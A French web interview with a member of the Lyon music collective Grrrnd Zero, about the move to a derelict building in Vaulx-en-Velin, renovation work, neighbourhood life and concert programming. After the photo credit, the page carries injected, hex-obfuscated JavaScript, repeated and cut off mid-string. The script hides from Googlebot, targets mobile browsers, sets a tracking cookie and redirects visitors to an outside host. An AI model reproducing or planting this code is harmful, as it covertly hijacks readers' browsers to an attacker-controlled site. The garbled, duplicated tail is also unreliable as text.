Grrrnd Zero

par |
Le Grrrnd Zero s'est, en l'espace d'une dizaine d'années, clairement imposé comme l'une des emblématiques entités naviguant autour des diverses cultures underground de la ville de Lyon. Abritant concerts, locaux de répétitions et ateliers de créations, le collectif a récemment dû s'exiler et quitter son lieu de subsistance pour espérer un futur bien meilleur à Vaulx-en-Velin, au sein d'un bâtiment certes délabrée mais aux innombrables possibilités. C'est justement pour discuter de ces possibles que nous avons rencontré Florian, l'un des membres du collectif.

GZ

Cependant, pour bien comprendre le contexte, les tenants et les aboutissants de cette longue et luxuriante discussion, nous recopions ici des extraits du manifeste de Grrrnd Zero, entrecoupée d’extraits provenant du site du collectif:

Grrrnd Zero est né il y a maintenant 11 ans autour d’un gang d’individus affamés de musiques impossibles qui, lassés par l’absence de lieux adaptés à leurs penchants, décidèrent de squatter un bâtiment vide appartenant au Grand Lyon.

Depuis cet événement inaugural, nous avons poursuivi le même objectif : bâtir un abri stable, préservé de la précarité perpétuelle subie par la majorité des lieux d’activités alternatives, tout en sauvegardant notre part d’autonomie. Nous soutenons ainsi qu’il est possible d’élaborer collectivement une politique en funambule, entre négociations pragmatiques avec les pouvoirs publics et refus des compromis quant à nos contenus et nos modes de fonctionnement.

En bout de course d’un scénario tragicomique, jalonné de tentatives de nous faire partir prématurément, nous avons fini par quitter le 40 rue Pré Gaudry, base principale de GZ pendant six ans sur le fil d’une convention d’occupation éternellement temporaire.

En condition impérative à notre départ du précédent lieu, nous avons négocié avec la municipalité la mise à disposition d’un autre bâtiment inutilisé, appartenant lui aussi au Grand Lyon. Un espace vide pour le moment inexploitable qui aurait pu a priori sonner comme un déclassement. On passe effectivement d’un lieu retapé pendant des années à une friche sans électricité, sans eau, et même, euh, sans murs.

Nous avons évidemment refusé de troquer une situation de fragilité contre une autre, et avons convenu avec la mairie de Lyon que les travaux de remise en l’état du nouveau lieu soient en grande partie financés par elle, tandis que notre collectif assurera tous les choix, le suivi et une partie de la réalisation des travaux. Il ne s’agit pas de nous construire un parcours de golf indoor 46 trous sur un budget extensible à l’infini, mais simplement d’avoir de l’eau, de l’élec, des murs, et un toit qui ne s’effondre sur personne.

GZ

Vous repartez à zéro à partir d’un nouveau lieu, Bohlen, situé à Vaulx-en-Velin. Vous avez annoncé avoir commencé les travaux il y a quelques mois : où est-ce que vous en êtes ?

Ça a été très laborieux d’obtenir l’autorisation pour pouvoir commencer les travaux parce qu’on aurait normalement dû commencer il y a plus d’un an. On a vraiment commencé depuis mars dernier, c’était un chantier illégal entre mars et juillet et on disposait des clés seulement en tant que futur locataire. On était en phase de grosses négociations avec la ville, on ne comprenait pas pourquoi on était encore hors-les-murs depuis un an. En mai dernier, ça faisait un an qu’on était hors-les-murs, on a commencé les travaux à ce moment-là pour forcer un peu le destin avec des moyens moins importants. On était en mode chantier un peu secret mais on le disait quand même à tout le monde qu’on travaillait, nous l’avons d’ailleurs fait savoir pour forcer un petit peu la ville. Ça n’a pas énormément avancé, mais après un gros brassage avec la ville et un dernier coup d’éclat médiatique de notre côté avec l’affichage, on a réussi à obtenir la signature avec tout les trucs bien en ordre en juillet, et on est depuis dans un cadre plus régulier.

On travaille depuis ce temps-là sur deux bâtiments dans le nouveau lieu à Vaulx-en-Velin : il y a un bâtiment de bureau de 500m carrés où se trouvent deux étages de 250m carrés chacun qu’on est en train de rénover et qu’on a déjà bien rénové. Le truc était abandonné depuis presque 10 ans donc on a dû tout retaper, démonter, cleaner, restaurer les pièces, les rendre plus vivables, cette phase-là est à peu près terminée. On va commencer maintenant les travaux d’électricité et de plomberie sur cette zone-là, ces travaux ont été retardés parce qu’on avait pas justement les papiers et les accords pour être officiellement locataire du truc. On ne pouvait pas engager de plombier, on ne pouvait pas signer d’assurance, ça a pris du retard. Du coup ça ne commence que maintenant (ndlr: en novembre 2014) et il y a l’autre bâtiment qui fait 1500m carrés, qui est un grand hangar vide, où l’on construira la salle de concert, les locaux de répétitions, toutes les pièces liées aux activités musicales et tout ce qui sera atelier sérigraphie, électronique, des choses qui demandent plus de volume. On commencera cette partie-là ces jours-ci. On va vraiment monter des zones de toutes pièces, on change la nature du bâtiment, avec une salle d’accueil du public de 600 – 700 places.

Après c’est l’autre partie du chantier, et l’objectif pour nous c’est d’ouvrir au moins la salle de concert. On verra pour l’intégralité du hangar mais au moins la salle de concert pour la rentrée prochaine.

Pour l’instant on est hors-les-murs puisque on est en chantier, on a fait pas mal de concerts au Périscope, au Sonic, dans des plus petits lieux de Lyon comme la Triperie, il y a aussi des lieux privés ou des squats, on navigue pas mal de lieu en lieu.

gz4

Une question que je me posais par rapport à Bohlen, c’est qu’il était question à un moment de partager le lieu avec d’autres assos. Est-ce que c’est toujours d’actualité ?

Ce qui a changé c’est – lorsqu’on a commencé à s’installer légalement dedans – que l’on s’est installé un peu au hasard puisqu’on avait pas de parties bien délimitées. Nous on a le bâtiment de hangar, il fait à peu près 4000m carrés et on en occupe 1500 pour l’instant. Ce qui s’est passé dans les six derniers mois, c’est que le Grand Lyon a monté un mur pour vraiment délimiter 1500m carrés. Pour nous, ça a été un temps de débat pour savoir comment s’installer, mais maintenant, on a 1500m carrés qui sont complètement fermés, complètement délimités du reste. Derrière, il y a une zone de 3000m carrés qui dort, on ne sait pas trop où ça en est, ils parlent de peut-être la prêter à des assos mais en priorité de la louer pour essayer de la rentabiliser. Ils parlaient de louer à des entreprises – pour du stockage, pas pour des activités – mais ça ne s’est pas concrétisé. De toute façon, on est les premiers à s’installer donc on a d’une certaine manière le droit du sol, on va faire un truc qui va accueillir du public. Le bâtiment est en très mauvais état, pas d’électricité, pas d’eau, pour les entreprises c’est vraiment difficile à part du stockage sec, et pour des assos, même si ils en parlent, je vois pas qui aurait les moyens de faire ça.

Ca paraît assez taré comme lieu, la configuration est en tout cas vraiment différente de celle de Gerland, le précédent lieu que vous occupiez, qui s’étalait sur deux salles de concert différentes, un compartiment locaux de répèts isolés et des bureaux à l’étage… c’était un lieu très cool, comment vous l’avez géré durant la période pendant laquelle vous étiez présents là-bas ?

Il y avait des défauts à Gerland qui étaient de l’ordre structurel du bâtiment. On commençait à avoir des gros problèmes de plomberie récurrent à chaque hiver, il y avait un étage au dessus de l’étage des bureaux qui a subi de gros dégâts des eaux, on a du couper l’eau à cet étage-là. Des soucis structurels dûs à un bâtiment très vieux, notamment quelques sections du bâtiment où l’installation électrique fatiguait un peu, surtout qu’on était tous sur du chauffage électrique et du coup les plombs sautaient relativement fréquemment.

Après c’est vrai que cette disposition là où t’avait deux trucs séparés l’un de l’autre et où deux ambiances pouvaient coexister, l’une bruyante, l’autre calme, c’était pas mal. Surtout que le bâtiment de Gerland était super bien parce que t’avais un déroulé dedans, tu pouvais vraiment aller d’un point à un autre et passer par plein d’endroits différents.

Oui c’est ça qui était chouette aussi, ça faisait labyrinthe, ça rendait le truc vachement vivant, à chaque fois que t’y allais tu pouvais découvrir une nouvelle pièce avec un nouvel atelier etc…

On maintiendra la séparation entre les activités bruyantes d’un côté et plus silencieuses de l’autre, sauf que celle-ci, au lieu de se faire dans des étages et dans des ailes de bâtiments, elles se feront entre deux bâtiments différents. On a énormément de surface extérieure autour, on a aussi l’usage de tout l’extérieur jusqu’à la partie délimitée par le Grand Lyon, et je sais pas combien de mètres carrés d’extérieur avec parking et jardin. C’est plutôt la jungle en ce moment, la séparation se fait donc par-là : les deux bâtiments sont reliés par un passage couvert et les locaux de répèts sont vraiment dans un coin. Comme avant, tous les gens pourront se croiser facilement, par contre c’est vrai qu’il y aura peut-être un peu plus de distance entre les bureaux et les locaux de répèts par rapport à la proximité de Gerland. Mais c’est juste de la distance extérieure. On va construire plein de petites pièces à l’intérieur du hangar, ça va être un ensemble de blocs couverts avec une cuisine vraiment équipée, une pièce un peu plus grande pour les grandes réunions… Pour le moment on se concentre sur une véritable ERP, on verra par la suite pour le reste, si on se motive a faire une salle de projections, plus tard. Pour le moment, notre objectif, c’est vraiment se focaliser sur la salle ERP, capable d’accueillir du public en sécurité.

GZ1

C’est vrai qu’à Gerland, la majorité du public qui venait n’était pas forcément au courant de ce qui se passait au sein même du bâtiment en dehors des concerts. Le nouveau lieu laissera beaucoup plus de place aux autres activités.

Il y a pas mal d’envie de développement en interne, ça fait un petit moment qu’on s’occupe majoritairement de musique et on a envie de faire autre chose, comme par exemple des activités ouvertes en journée. Si t’as un atelier de couture, que ça puisse servir par exemple aux gens du lieu, on pourrait faire ça sur des samedi aprèm ou des dimanche. Des bouffes, soit même que des gens hors de l’asso puissent avoir accès aux ressources de GZ en dehors des concerts. On a pas du tout pensé le truc, on sait pas comment ça s’agencerait dans l’idée, on se met ça en consigne, en ligne directrice, le bâtiment on le veut un petit peu plus ouvert en journée ou en soirée, et l’idée de l’ouverture c’est d’être un peu moins replié sur nous-mêmes, sur le quartier. Même si il n’y a pas de grosse vie de quartier dans la zone de Vaulx-en-Velin où on est – c’est une zone très commerciale, très industrielle, il n’ya pas de café, on est derrière un centre commercial – il y a une vie de journée, mais qui est de l’ordre de la grande consommation. Il y a des gens qui vont chez Casto ou Jardiland acheter des plantes. On est coincé entre des concessionnaires automobiles, c’est ça nos voisins, ce sont des voisins très grands, très démesurés. Les avantages, c’est qu’ils ne prennent pas le bruit, et les inconvénients, c’est que du coup nous on aura plus de mal à créer une vie de quartier où les gens peuvent se pointer prendre un café.

Mais par contre, on ne veut pas non plus faire comme à Gerland, où on aurait pu faire une dynamique de quartier mais on ne l’a pas fait du tout. Il y avait plein de gens de la zone qui habitaient à Gerland, qui ne savaient même pas qu’on était ouvert et ce qu’on faisait. Ce qui fait que quand on est parti de Gerland, la mairie du 7ème n’a rien fait, elle n’a fait aucun signe particulier pour qu’on puisse rester plus longtemps. Pour un quartier comme ça, un lieu comme GZ, qui propose tellement de trucs différents, que la mairie locale ne dise pas genre « ah ouais quand même ça nous fait un peu chier que ce projet quitte notre zone », ça laisse penser qu’on a pas été assez actif au niveau de la dynamique de quartier.

Et pour quelle raison justement vous n’avez jamais réussi à créer cette dynamique de quartier ?

Manque de temps, d’autres trucs sur le feu, c’est toujours pareil en fait : il y a des gens qui ont pensé à le faire mais manque de temps, manque de forces vives, manque de moyens à l’époque… On a des années d’expérience de chantier maintenant. Quand j’y repense, avec le recul, je me dis qu’il y avait une grosse envie de faire plein de concerts puisqu’il y avait une grosse coupure, et ils avaient été un an et demi hors-les-murs. Ils avaient très vite envie d’utiliser à fond le potentiel du lieu pour répéter par exemple, faire des concerts, ça a cannibalisé beaucoup de temps et ils n’ont pas eu le temps de se dire : « ah ouais non on aimerait créer un dynamisme de quartier aussi ». Ils étaient plus dans l’exploitation pure et simple du lieu. On s’est finalement dit qu’il fallait commencer à le faire au moment où on a eu l’avis d’expulsion du Grand Lyon.

Mais vu que c’est un lieu qui apparaît quand même comme temporaire, t’as forcément envie de l’exploiter à fond et de rapidement laisser de côté les trucs qui paraissent accessoires ou moins funs.

Il y avait aussi un autre truc que les gens se disaient, c’est que GZ – en général – fait un énorme effort d’accessibilité, parce que l’on colle beaucoup d’affiches, que l’on communique énormément et que l’on fait des tarots très bas. C’est les variables générales d’accès au lieu, elles sont hyper ouvertes et légères, ce qui fait qu’en général tu peux te dire que tout le monde peut venir . Après, peut être que l’on a pas fait assez d’efforts concentrés sur une petite zone : on a crée les conditions générales à ce que tout Lyon puisse venir, mais on a pas fait un truc très ciblé en visant les gens du coin et en les avertissant que des concerts se déroulaient à côté de chez eux. Organiser une date de type MJC, ce n’est pas l’esprit GZ, on souhaite que tout le monde puisse venir sans disparité mais ça a malheureusement dilué l’effort micro local.

D’accord, et c’est donc ça qui a mis la vie de quartier au second plan par rapport à l’accessibilité générale

Oui parce qu’on avait quand même des gens du 7ème qui venaient mais on ne faisait pas autant de trucs qu’on envisage à GZ Vaulx-en-Velin. Quand tu t’installes sur une zone tu peux proposer soit un service qui va aussi servir à d’autres assos, comme une pièce de réunion collective. On l’a pas fourni à l’époque par exemple, mais on pense aujourd’hui aussi à tout ce qui concerne les activités hors-musique style atelier de réparation de vélo, couture, des petits services qui sont beaucoup plus utiles au quartier qu’un concert de punk rock par exemple. Et puis on s’approvisionnait beaucoup sur les petits commerçants du coin à Gerland, on aurait pu tenter en dealant quelques chose en tant que client régulier, mais on a pas du tout joué là-dessus alors qu’on aurait pu créer une vraie vie de quartier.

Du coup pour participer à cet élan collectif est-ce que vous allez laisser des personnes extérieures organiser des concerts avec Bohlen ?

Bien sûr, on va refaire la même chose qu’à Gerland : la moitié des concerts était organisée par des gens en interne et l’autre moitié par des personnes extérieures au crew de réunion. On arrivait à un truc un peu moitié moitié, on essayait parfois de se mettre une petite discipline, si quelqu’un avait déjà programmé sept ou huit dates déjà et qu’il y avait quelqu’un qui en avait pas encore programmé une cette saison-là on fonctionnait par priorité, on faisait ces petits efforts-là. On aimerait bien laisser le truc le plus ouvert possible aussi au niveau des assos du coin, mais aussi des assos de Lyon qui voudraient faire des trucs à Vaulx-en-Velin.

GZ3

La question que je me posais également par rapport aux orgas c’est que comme Bohlen est un lieu relativement excentré par rapport au centre de Lyon, ça va poser des impératifs de distance qui ne vont pas forcément servir les concerts à petite jauge/expé et sans tête d’affiche.

Ce qui change, là, c’est qu’on peut faire des trucs moins tard. On essaye de faire des concerts qui commencent un peu plus tôt pour avoir le temps de placer assez de groupes pour pas faire genre des soirées à mille groupes qui finissent méga-tard tout le temps. Si tout se passe bien et qu’on a pas des frais trop élevés – ce qui devrait être jouable – on reste un des lieux les moins cher et les plus accessible de Lyon. Donc ça attire toujours pas mal. Là où il y a un truc qu’on ne mesure pas je pense, c’est qu’il y a un effet rareté : ça fait quand même un an et demi qu’on est à moitié fermé/à moitié ouvert, il y a quand même pas mal de demandes et d’attente de gens qui ont envie de faire des teufs et justement d’aller dans des lieux un peu plus relâchés que d’habitude. Après avec un rythme très régulier comme on faisait avant à Gerland, peut-être que ça marchera un peu moins bien… Moi je me dis que les gens qui venaient à Gerland pour les trucs très pointus, ils viendront à Vaulx-en-Velin aussi pour les trucs pointus parce que ce sont des gens qui font l’effort de se déplacer pour des trucs pointus. Le public qui venait en nous faisant confiance et qui se pointait au hasard aux soirées à Gerland, peut-être qu’il va moins facilement se pointer à Vaulx-en-Velin, c’est pour ça qu’il faut qu’on bosse pas mal sur les à-côtés. Faut qu’on soit plus efficace sur les à-côtés, je pense à des trucs type un lieu hyper confortable, sympa, qui donne envie d’y aller même si c’est loin. Je pense également à la cuisine, on va vraiment la développer et essayer de servir à manger, parce que c’est un format qu’on va sûrement se retrouver à mettre en place. Des concerts ouverts plus tôt pour qu’on puisse finir pile poil à l’heure au métro, ce qu’on est arrivé à faire dans le passé même si on a souvent été feignant de ce point de vue là à Gerland.

C’est vrai qu’une mauvaise manie de GZ, c’était de commencer tard, mais vous pouviez vous le permettre parce que c’était à coté.

Mais en même temps, c’était une mauvaise chose quelque part parce qu’avec tout les gens qui devaient partir pour des raisons de travail, familiales, etc… loupaient souvent les têtes d’affiches et là, maintenant, on peut plus se le permettre, du coup on est en train de pousser pour changer cette mauvaise habitude en commençant plus tôt, avec des à-côtés qui pourront justifier de venir à 19h30/20h au lieu de venir plus tard, après avoir pris ton apéro, mangé…  on veut proposer ce truc-là sur place, mettre en place un dispositif de covoiturage quand on sera bien installé. Un autre truc sur lequel on peut jouer, c’est peut-être les fameux métro ouverts plus tard les week-ends, promis par la ville et qui sont plus du tout d’actualité, plus personne n’en parle…  Par contre c’est vrai que pour les petits trucs ça ne résout pas vraiment la question. Les petits concerts, de toute façon, sont de plus en plus rares à Lyon. Les petites soirées, ce public-là a toujours été petit. Aujourd’hui, t’as le Sonic, c’est un des rares lieux qui fait encore des trucs expés pointus, avec un peu le Périscope dans une certaine mesure, et la Triperie en fonction des organisateurs. Mais au Sonic, ils continuent depuis 7/8 ans, et même si c’est pas si loin de Perrache, ils continuent de pas avoir grand monde pour ces soirées-là. A mon avis, les trucs expés pointus, ça restera toujours difficile quelle que soit la distance, et le seul truc pour faire qu’il y ait du monde pour ce type de musique, c’est de tabasser sur la promo, le lieu et de mélanger les affiches. Et ces éléments-là, on les a toujours sous contrôle, qu’on soit à Gerland ou à Vaulx-en-Velin, l’inertie du public qui serait de se dire : « putain fait chier d’aller à Vaulx-en-Velin, c’est loin », elle va peut-être arriver, peut-être qu’il y aura moins de monde qui se pointera à l’improviste, c’est-à-dire des gens qui se pointaient parfois à GZ souvent à 22h, après un apéro en mode est-ce qu’on y va, est-ce qu’on y va pas…

C’est une configuration qui demanderait peut-être une réflexion au niveau de la prog dans le sens où tu ne peux pas programmer tout et n’importe quoi n’importe comment. C’est un lieu qui est particulier de par sa situation et sa taille.

De toute façon on va faire au cas par cas, on va voir au fur et à mesure. Je me dis juste que les trucs trop cloisonnés, les petites affiches, les petites scènes, on aura effectivement du mal, mais si on pousse justement les orgas expés à s’insérer sur des affiches un peu plus grosses, on peut faire un truc. C’est vrai que j’ai toujours aimé les mélanges, une soirée pop va autant me saouler qu’une soirée expé, au niveau de mon attention : si je vois 7 groupes de noise à la suite, ma mémoire va mal le gérer, je vais moins apprécier et ma petite mémoire fatiguée va plus aimer un super groupe de pop en première partie d’un groupe de noise qui était cool à la suite.

Oui du coup ça ressort plus quoi.

Effectivement oui du coup ça peut être bien. Sur la petite jauge entre 50 et 100, si la Triperie ne ferme pas et que le Sonic continue, on est pas trop mal lotis à ce niveau-là sur Lyon en terme de petites salles. On peut aussi penser aux nouveaux lieux de cette taille, comme le resto-concert des Bons Sauvages, le Couac à Villeurbane…  Je pense donc qu’on sera complémentaires par rapport à ces lieux dans le sens où si tu ne veux pas participer à une affiche plus chargée, tu pourras organiser tes concerts dans ces lieux-là. Le seul cas de figure un peu chiant que j’envisage en fait c’est que les orgas extérieures aient la flemme d’organiser à Bohlen.

Des orgas feront certains types de concerts là-bas et les petites orgas expés à 50/100 personnes privilégieront la ville donc. Je trouve que ce n’est pas une distinction gênante dans le sens où je pense que GZ se doit de ne pas aspirer tout les concerts de la ville.

Après clairement la scène expé à subi un peu la fermeture de Buffet Froid (ndlr: haut lieu des cultures expés à Lyon qui a fermé l’année dernière) puisque tout se passait un peu là-bas au niveau de cette scène. Le Sonic en fait encore, certains squats un peu, mais c’est un peu plus mort qu’avant.

GZ2

Une autre question que j’avais c’était par rapport au noyau dur en fait. Quand j’étais à Gerland, en tant qu’utilisateur des locaux de répèts, vous décrétiez parfois des journées de nettoyage commune du bâtiment mais il n’y avait pas forcément foule au rendez-vous, on retrouvait souvent les mêmes personnes. C’est un exemple que je prends pour illustrer le fait qu’il y avait peut-être une distinction entre le noyau dur du crew et les utilisateurs qui ne se sentaient pas vraiment concernés par la pérennité du lieu. On retrouvait la même chose au niveau des cotisations annuelles.

Cette partie du crew sera toujours active, elle sera encore là pour impliquer – plus qu’avant – les utilisateurs des locaux de répèts. C’est vrai qu’on avait un peu de mal à Gerland à impliquer les gens qui utilisaient le lieu mais qui venaient principalement pour leur propre activité. On les a vite fait pris en main au début mais c’était principalement le noyau dur qui gérait tout de A à Z, probablement par manque de confiance et par pur enthousiasme, parce qu’ils se disaient que les gens allaient pas le faire bien. Maintenant, vu qu’on part sur un nouveau lieu avec une réinstallation de GZ d’un seul coup sur une nouvelle base, on va avoir l’occasion et le temps de se mettre bien tous d’accord. Ce qui était un peu chiant à Gerland, c’est que t’avais une dynamique générale assez forte qui empêchait peut-être les nouveaux et les utilisateurs occasionnels du lieu de se raccrocher à ce mouvement.

Du coup le statut était un peu trouble.

Sauf que maintenant, vu qu’on est vraiment arrivé à un moment où au lieu d’avoir quelques nouvelles personnes qui viennent et qui se découragent de ne pas pouvoir réellement porter cette dynamique, tout le monde va arriver en même temps et on pourra faire des trucs qu’on a jamais fait genre un règlement intérieur des conditions d’utilisation, ce genre de trucs, et que ces conditions soient partagées par tout le monde. Parce que à Gerland, ce qui a pu fatiguer des gens aussi c’est que les tout premiers arrivants, les premières années, se sont vu attribués un espace avec pour mission d’en faire exactement ce qu’il voulait, qu’on les adorait, et qu’on leur demanderait éventuellement une cotis. Et puis lorsqu’on revient vers eux et qu’on leur dit « ah mais non non non en fait oui t’as ta pièce mais en fait y’a des conditions il faut que tu fasses ci et ça » ça casse un peu le truc, je comprends la dynamique de dire que c’était pas ça le deal de départ du coup. Là il pourra y avoir une base commune, et avec l’expérience qu’on a accumulé ces dernières années, c’est à nous de jouer là-dessus. On part d’une base toute neuve, ce qui n’est pas le cas de Gerland qui est un projet qui était parti d’un squat puis d’un lieu un peu temporaire qui en plus était très, très grand.

Oui c’est quelque chose qui s’est improvisé au fur la mesure.

C’est ce qu’on a fait, on a cette expérience-là maintenant et on est plus aveugle dans ce domaine.

GZ

La différence aujourd’hui c’est que vous savez à peu près ce que vous voulez et que vous avez les moyens de le réaliser, alors qu’à Gerland tout s’est amoncelé d’une certaine manière.

Oui c’est un truc à préciser parce que à Gerland le projet à toujours voulu avoir des locaux de répétition et d’autres trucs. Mais le bâtiment qu’ils ont obtenu à l’époque était largement plus grand que ce qu’ils voulaient et c’était genre « OUAH il faut le remplir on va appeler tout nos copains ». Après le projet GZ ne change pas systématiquement en fonction du lieu, le cœur du projet c’est quand même défendre une certaine conception  de la musique/de l’orga de concerts et ses à-côtés type vidéo, image, dessin. On voulait vraiment créer un lieu multifonctions qui a été quand même pas mal improvisé.

Donc c’était une évolution qui était pas forcément attendue avec des idées qui sont arrivées en cours d’exploitation.

En cours d’exploitation et avec une grosse accélération. Je pense que ce qui a pu se passer pour les gens organisés et efficaces sur des concerts de petites tailles se sont retrouvées dans un cas concret 4 fois plus gros qu’eux, avec nos petites idées et nos petites envies. Aujourd’hui le lieu qu’on a est encore plus conséquent, faut qu’on fasse cinq fois plus de projets tout en maintenant une ligne directrice. On a mis tellement de temps à obtenir le lieu et à commencer les travaux que les projets se sont un peu étiolés  pour l’instant mais on va travailler dessus, essayer de pousser les gens qui avaient des ateliers à revenir.

Après un espace et des possibilités comme ça ça va forcément attirer des gens.

Carrément ça permettra des ateliers avec tout un tas d’activités à définir.

Ce sera donc globablement mieux géré vu que vous avez l’expérience GZ. La dernière question que j’avais c’était à propos d’Amour & Discipline, pour savoir où ça en était ?

Alors moi du coup j’en fais pas partie – sauf la première année – mais j’ai quand même continué à suivre. Ca a changé de nom, ça s’appelle Donation Conspiracy, et on organise une soirée de soutien le 10 novembre prochain. Le site est encore en beta, y’a encore plein de petites corrections à faire mais la partie don, au niveau technique, ça fonctionne. Après, d’un avis extérieur, c’est pas finalisé, ils ont perdu beaucoup de temps et d’argent sur le développement, ils ont plein de couilles mais maintenant, avec la soirée de soutien et le lancement officiel de la beta, ils sont en train de réactiver leur réseau pour faire circuler le site. Il manque juste qu’ils autonomisent un peu le fonctionnement et que ça se lance véritablement.

MERCI

Crédit photos: Romain Item – Collectif Item}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s 